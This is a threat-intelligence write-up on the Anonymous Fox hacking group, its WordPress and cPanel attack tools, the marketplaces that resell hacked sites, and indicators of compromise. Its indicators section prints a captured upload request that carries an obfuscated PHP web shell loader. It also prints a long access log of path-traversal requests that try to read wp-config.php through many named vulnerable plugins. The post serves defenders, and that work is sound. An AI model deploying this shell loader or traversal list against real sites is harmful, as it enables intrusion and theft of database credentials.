Part I

What is Anonymous Fox? 🦊

  • Anonymous Fox is a threat actor group that develops and distributes multiple tools that are used to attack websites and gain, hijack, and/or maintain unauthorized access.

They have been in operation since at least late 2019.

Who is a target? 🎯

Their tools target websites using popular CMS software like WordPress, Joomla, Opencart, Drupal, and the hosting software cPanel.

However when scanning for targets they will scan any publicly accessible website and collectively send out tens of millions malicious requests per month.

That is from a source at a major web host, so the total number of monthly requests is much higher and probably exceeds 50 million malicious HTTP requests per month at its peak.

Anonymous Fox Tools 🧰

An overview of the most popular Anonymous Fox attack tools. I will post indepth analysis of them soon.

FoxAuto

  • FoxAuto v6+ (free)

    "This tool is for fully controll Shells and all kinds of panels (cPanel/Wordpress/Joomla/OpenCart/Drupal) And by mass !" - Anonymous Fox

    The most common Anonymous Fox tool with reportedly over 10,000 active users.

    It is used as a post-compromise tool and requires the user to provide a list of compromised websites which it can then connect to and remotely manage.

Fox Ex

  • Fox Ex v1 & v2 (recon & exploiter, $300-500)

    The main attack tool of Anonymous Fox. It will attempt to exploit a number of known WordPress plugin vulnerabilities like LFI exploits.

Fox RSF

  • Fox RSF v1 & v2 (Random Shell Finder, $500)

    This is an effective tool at crawling for existing PHP shells on compromised websites.

    Once found - the attacker can steal the unauthorized access to the website.

Fox-CGI

  • Fox-CGI v1 (vuln scan & exploiter, $500)

    Not much is known about this attack tool.

Anonymous Fox will occasionally post additional tools to their audience, however these are usually supplemental to the main tools listed above.

Hacked Resources + Marketplaces = 💰💰💰

Hacked websites and their servers are an in-demand resource from bad actors that wish to use them when committing other malicious activity, which is usually some form of fraud (e.g phishing, spamming).

This can be compared to how criminals will use a stolen car while committing a more serious crime in an effort to distance their own identity from the crime itself.

This is beneficial to the bad actors as they don’t have to recon for vulnerable websites and then exploit them.

Bad actors can instead buy access to hacked website resources through sellers on marketplace websites.

What resources are most often hacked and resold?

cPanels

  • Provides the most access to web server resources for the buyer.

  • Usually allows the buyer to add new domains to the hosting plan, or change existing domains.

  • Can also create resources like email accounts and FTP accounts.

Shells

  • PHP backdoors provide access to the website’s file system.

  • Anonymous Fox has their own PHP shell named FoxWSO, which is a reskinned version of the classic WSO shell.

  • Usually unable to modify DNS, create email accounts, and/or FTP accounts.

Email (SMTPs & PHP mailers)

SMTPs are hacked email accounts (username & password) that can use the standard SMTP to send out emails, unlike PHP mailers.

	- FoxAuto can create email accounts if it can access the website's cPanel

PHP mailers are PHP files placed onto a hacked web server and allow email to be sent directly from the PHP script without needing a SMTP username & password.

FoxAuto by default will use Leafmailer as the uploaded PHP mailer

Marketplaces

The largest sellers on the biggest marketplace websites have been estimated to earn in upwards of 200,000 USD or more per year based on transactional history that is available.

Olux

A great paper on Olux and an over of their marketplace website can be found here. This paper only covers the SMTP/PHP mailer aspect and Olux’s main website.

Olux had their website’s source code stolen in early 2020 and made publicly available.

Xleet

An ad for Xleet store

Xleet operates numerous shops and seems to be the most advertised of the marketplaces.

Our Domains are xleet.la | xleet.io | xleet.site | xleet.pw | xleet.sh | xleet.fo | xleet.cc | xleet.to | xleet.is | xleet.pro - Please Save them! [Already have...]

Variants

Nowadays many marketplaces have websites that look and function very similarly.

This is because the souce code for Olux’s website was leaked in early 2020 so many markets use modified versions of that same code.

Rebranding from Anonymous Fox to Fox Cyber Security [FCS]

Something has recently made Anonymous Fox go into full damage control and start using the “We are a security research organization trying to help others…” excuse.

In case that wasn’t suspicious enough - they also abandoned the Anonymous Fox name (at least publicly) in favor of Fox Cyber Security [FCS].

IoCs

Work in progress…

[updated 3/18/2022]


anonymousfox.io
anonymousfox.is
anonymousfox.mx
anonymousfox.pw
youfox.co
bing.de.com
twiter.com.co
youtube.br.com
ufox.tube

f48527cab15d7a3f9e09f11d65feadd0  ./s_ne.php
4655323e6bf26a5616ede6f2e1dd0797  ./class-wp-widget-archives.php
df3a38b5dbfa75ba75e24ebfcc19063d  ./wp-load.php
dacc0f895428822979bda234f4f15bfe  ./admin.php
88c69bd369d3400efcb517ad799f5e32  ./wp-2019.php
2068c61ae08c7985f8408092f6ce1a87  ./ups.php
15c41caae4db3252d12368c89d9b93ae  ./wp-plugins.php
05d80c987737e509ba8e6c086df95f7d  ./doc.php
983ff2eb67a5ce9b2e4ce01c0e4bf6b5  ./wp_wrong_datlib.php
a8c6261d188ab60fab369abe7d9af903  ./3index.php
80e8d81958161c618cb23f657804d44c  ./moduless.php
b0965dca28ef02d8152d4b969ac972e6  ./wp-admin.php
2d68ce330038b0ef61cde26d7261c941  ./radio.php
c0f851540f6a87798ce1e537e079a760  ./beence.php
1a09efdc2d5a1f8b31132238651df3fb  ./old-index.php
0444c0c6d8cde857bba5d202fab1792b  ./s_e.php
36ca2fc9ab24f903b2fb933496c5b0cd  ./search.php
70997c01e603cdaea453f7d9da5bba2e  ./about.php
1863e5fb6b9a841c68f2be3cf9a1e1d6  ./on.php
6468eb9861615597c918771ac5e66a18  ./wikindex.php
95623a0bbf349878d02c22207f0727e5  ./index3.php
fb1fd5d5ac7128bf23378ef3e238baba  ./accesson.php

FoxAuto 


POST /wp-content/6dicb.php HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Language: en-US,en;q=0.9,fr;q=0.8
referer: bing.com
Content-Length: 3694
Content-Type: multipart/form-data; boundary=b6e6256141ea40b417eadcdd3547952e

--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="submit"

Upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="Submit"

Upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="submit_upload"

upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="_upl"

Upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="upload"

upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="v"

up
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="upl"

1
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="p"


--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="a"

FilesMAn
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="p1"

uploadFile
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="ne"


--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="charset"

Windows-1251
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="c"


--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="path"

./
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="upl_files"

upload
--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="fname"


--b6e6256141ea40b417eadcdd3547952e
Content-Disposition: form-data; name="up"; filename="wpnuhmgine.php"

<?php error_reporting(0); function Momdo($T1R7y) { $CyJ4O = strlen(trim($T1R7y)); $yB2qC = ''; for ($srffE = 0; $srffE < $CyJ4O; $srffE += 2) { $yB2qC .= pack("C", hexdec(substr($T1R7y, $srffE, 2))); } return $yB2qC; } eval(MOmdO("6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827") . 'eJyNVH9ME2cYZgwZYyObDqdTcSc2ay/r8AotRc4u1nIFtKVNWxTlyq20X/G0tPV6LcVy25wLmToZM8zgNrI/nDPooobp5kw0Q5kOf6BOBRlKFopxiWEbYlFhLvuuLVGpNrvk8l3ufd7n/fE974sAhnExFAPcLoalnVUiglJqNBUEVaIzFasIFLcBO+0EImGnUIwI9w71CVFcUKjRLVFqjOWdZkSBAL/b4bJBRF1i3TN1SRBWtZ522h0WFog83koPy4iEr29JSQg/qZ8Z+pjfsJdbfGOX91/Y8lxz1zsbF5DkkqJN7R0HFw8EHgwMEzNPtd0YnjK7/pP9GXL60tulO1e2KPJXDa2Zcil996vH/w0FQydCxjTxVf3KWwHldmT8n4ZX3IdEzIvSP8+cLb65jCRPpvT1p1+VNJyfmtX27L6xrIafpp/NlqdtmzN4M6nfx5TdGPyOayv/PufugfICrGsczBo8UN6BeYaSfHiSHDk8vf35rRnaFGfv71OXfbz6g2DF380z91VIZZ3s+qOv9apbenqOnRF89NJM6c7O5RtSxloztO09P+/9Zc+bY9e6T+rZFzpGFAta+9XDw2Xd51pympK7VoUyuGmz7iTX3nljuHvNcPB4nXH+Vt/8gh17ljerTM23H+wMksI22l/V13jBKCBJTe26gYu3FmpH76RuSvwi79MPkfPbR09kptee7mk9Pa76ga13nFs7X3ZZoL2Srm3+Fhya1qS/Wpx8Y8ttZEzH3dPNXRTsy5/9eT11+JYVTb3f7T8e/Ct9c9ORfvXIH8GqdbuGdk05Vk2t/vHmlaE1u8t+fXf/wcvzFl9Yuvkas+7LnuoHIctpX+/AsvcbtW1cKhtCRt07NrQkJpu+OnLxbv6pa1/vRlV3W+eWqeQdg42z9KE5CfOKLNeXtvU6NmaMLOr8RnC/L+DZZr09o/n60fbu/nPvJY6smLH0XmJCglCM+TGLGHkrD0VRPC11svQwFF9MO2nKA1jRhMYCnVw5ZhaXlGo0T7YGICcm4cRPdYZmLNvM24F1tQuZ7IphORxO20W0J+xJFRKm8hh/DJOazSgaEOh9BTagqLR4QK6UsgErL/xJjDIOToiNzc2rUQgoI2FYThhiCHPNZtzrdNDOtaLMQATMkTI5KcslJTKM9MulpD9XQkqkOfDMgaeMlMDTL8/JRPlk7V6nlaVdTgr4aQ/riekHJudgtnbaASi3l6WsLicLnBAXLxgfKPJGgsE3UxwpGMU54PCAgL2GoeFU211u4HyEy59t58n8uXnQKZYMZh0li2lrnhl9GIKvi884WtNjufqzAeSJcoW7kR3+J5HxscJnJqz4ST0Nw6JpRNJ56CoJ9wC64hw30VPE6mUcapdf6WVdIoFNIvPWwItXejEXoeBNFFQZK0Lx8DfUjMsNZRM2i1WlBo1Ob6JMxVpCV2ri5S4BcZEGwlRqKDEZlCVGNWEQz8PiouEhjmYUFwZVpywkSkziWLFjC7m4vmqdRqNbodGplKZiXUk4IXgvcInT/CKPBJ98kRZ+NOJwGo0aCk5BsXqlnoBFxq/xIbhIZzTxYC4OuohQFvB9k6A4A1gvE7k9KCFgjUKhv0BfrWT0isnNqOSQrKfMuxXOJywbVLvZ2tidEG2ljePrhmplo+MhcOvKPOsVYRFXgUfGLpIA+ghlGMkvlIjLY5KLgrmoDfad35EOixXELjYMA+bJt2znxFF+/H9QSLB4BMBncUxki3P/AbUxDAQ=\')));'); $tV = "<token>000000000</token>"; /* FoxAuto */
--b6e6256141ea40b417eadcdd3547952e--

Fox Ex 


80.66.76.37 - - [12/Feb/2022:13:54:24 -0700] "GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1791
80.66.76.37 - - [12/Feb/2022:13:54:26 -0700] "GET /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 584
80.66.76.37 - - [12/Feb/2022:13:54:27 -0700] "GET /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1345
80.66.76.37 - - [12/Feb/2022:13:54:29 -0700] "GET /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 685
80.66.76.37 - - [12/Feb/2022:13:54:30 -0700] "GET /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1372
80.66.76.37 - - [12/Feb/2022:13:54:31 -0700] "GET /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2025
80.66.76.37 - - [12/Feb/2022:13:54:34 -0700] "GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 968
80.66.76.37 - - [12/Feb/2022:13:54:35 -0700] "GET /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1603
80.66.76.37 - - [12/Feb/2022:13:54:37 -0700] "GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1062
80.66.76.37 - - [12/Feb/2022:13:54:39 -0700] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 598
80.66.76.37 - - [12/Feb/2022:13:54:40 -0700] "GET /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 565
80.66.76.37 - - [12/Feb/2022:13:54:41 -0700] "GET /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 527
80.66.76.37 - - [12/Feb/2022:13:54:42 -0700] "GET /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 608
80.66.76.37 - - [12/Feb/2022:13:54:43 -0700] "GET /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 967
80.66.76.37 - - [12/Feb/2022:13:54:44 -0700] "GET /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 721
80.66.76.37 - - [12/Feb/2022:13:54:45 -0700] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 754
80.66.76.37 - - [12/Feb/2022:13:54:46 -0700] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 643
80.66.76.37 - - [12/Feb/2022:13:54:48 -0700] "GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 542
80.66.76.37 - - [12/Feb/2022:13:54:49 -0700] "GET /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 608
80.66.76.37 - - [12/Feb/2022:13:54:50 -0700] "GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1331
80.66.76.37 - - [12/Feb/2022:13:54:51 -0700] "GET /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 705
80.66.76.37 - - [12/Feb/2022:13:54:52 -0700] "GET /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2222
80.66.76.37 - - [12/Feb/2022:13:54:55 -0700] "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10 HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1275
80.66.76.37 - - [12/Feb/2022:13:54:57 -0700] "GET /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 556
80.66.76.37 - - [12/Feb/2022:13:54:58 -0700] "GET /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 19073
80.66.76.37 - - [12/Feb/2022:13:55:17 -0700] "GET /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 25828
80.66.76.37 - - [12/Feb/2022:13:55:43 -0700] "GET /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 14029
80.66.76.37 - - [12/Feb/2022:13:55:58 -0700] "GET /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2336
80.66.76.37 - - [12/Feb/2022:13:56:01 -0700] "GET /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3290
80.66.76.37 - - [12/Feb/2022:13:56:04 -0700] "GET /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3008
80.66.76.37 - - [12/Feb/2022:13:56:08 -0700] "GET /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1538
80.66.76.37 - - [12/Feb/2022:13:56:10 -0700] "GET /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 609
80.66.76.37 - - [12/Feb/2022:13:56:11 -0700] "GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1535
80.66.76.37 - - [12/Feb/2022:13:56:13 -0700] "GET /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 691
80.66.76.37 - - [12/Feb/2022:13:56:14 -0700] "GET /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1367
80.66.76.37 - - [12/Feb/2022:13:56:16 -0700] "GET /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 708
80.66.76.37 - - [12/Feb/2022:13:56:17 -0700] "GET /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1500
80.66.76.37 - - [12/Feb/2022:13:56:19 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2967
80.66.76.37 - - [12/Feb/2022:13:56:22 -0700] "GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3013
80.66.76.37 - - [12/Feb/2022:13:56:25 -0700] "GET /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3394
80.66.76.37 - - [12/Feb/2022:13:56:29 -0700] "GET /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2467
80.66.76.37 - - [12/Feb/2022:13:56:32 -0700] "GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1768
80.66.76.37 - - [12/Feb/2022:13:56:34 -0700] "GET /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 4713
80.66.76.37 - - [12/Feb/2022:13:56:40 -0700] "GET /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2725
80.66.76.37 - - [12/Feb/2022:13:56:43 -0700] "GET /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 652
80.66.76.37 - - [12/Feb/2022:13:56:44 -0700] "GET /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 484
80.66.76.37 - - [12/Feb/2022:13:56:45 -0700] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1686
80.66.76.37 - - [12/Feb/2022:13:56:47 -0700] "GET /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2318
80.66.76.37 - - [12/Feb/2022:13:56:49 -0700] "GET /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 2088
80.66.76.37 - - [12/Feb/2022:13:56:52 -0700] "GET /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1350
80.66.76.37 - - [12/Feb/2022:13:56:54 -0700] "GET /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1627
80.66.76.37 - - [12/Feb/2022:13:56:56 -0700] "GET /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1377
80.66.76.37 - - [12/Feb/2022:13:56:58 -0700] "GET /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1236
80.66.76.37 - - [12/Feb/2022:13:56:59 -0700] "GET /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3228
80.66.76.37 - - [12/Feb/2022:13:57:03 -0700] "GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 5334
80.66.76.37 - - [12/Feb/2022:13:57:09 -0700] "GET /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3518
80.66.76.37 - - [12/Feb/2022:13:57:13 -0700] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 1547
80.66.76.37 - - [12/Feb/2022:13:57:15 -0700] "GET /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 686
80.66.76.37 - - [12/Feb/2022:13:57:16 -0700] "GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 3631
